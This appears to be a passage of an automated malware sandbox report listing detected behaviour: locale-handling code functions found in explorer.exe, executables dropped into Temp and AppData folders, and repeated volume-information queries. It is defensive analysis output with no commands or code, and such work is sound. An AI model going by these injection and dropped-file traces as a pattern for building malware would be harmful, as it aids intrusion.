          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_0C376028
          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,4_2_0C36EB98
          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0E8C5EAC
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_0E8C65B4
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_0E8BD5CC
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0E8C6D3C
          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,4_2_0E8BEB98
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_0E8C6028
          Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,4_2_0E9186D4
          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,4_2_0E90F798
          Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,4_2_0E918CF8
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_0E916C28
          Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,4_2_0E9115BC
          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0E916AAC
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_0E918BF4
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_0E91F318
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,4_2_0E918B40
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_0E9171B4
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_0E90E1CC
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0E91793C
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,4_2_0E916950
          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,4_2_0F4BF798
          Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,4_2_0F4C86D4
          Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,4_2_0F4C15BC
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_0F4C6C28
          Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,4_2_0F4C8CF8
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,4_2_0F4C8B40
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_0F4CF318
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_0F4C8BF4
          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0F4C6AAC
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,4_2_0F4C6950
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0F4C793C
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_0F4BE1CC
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_0F4C71B4
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_10D7E1CC
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_10D871B4
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,4_2_10D86950
          Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_10D8793C
          Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_10D86AAC
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_10D88BF4
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,4_2_10D88B40
          Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,4_2_10D8F318
          Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,4_2_10D88CF8
          Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_10D86C28
          Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,4_2_10D815BC
          Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,4_2_10D886D4
          Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,4_2_10D7F798
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: GetProcAddress,GetLocaleInfoW,18_2_00007FFDFFC3DC20
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FFDFFC8FA48
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00007FFDFFC8F8C0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,18_2_00007FFDFFC8F478
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: GetPrimaryLen,EnumSystemLocalesW,18_2_00007FFDFFC8F3C4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: EnumSystemLocalesW,18_2_00007FFDFFC8F35C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,18_2_00007FFDFFC8D2E0
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\ucrtbase.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pyd VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
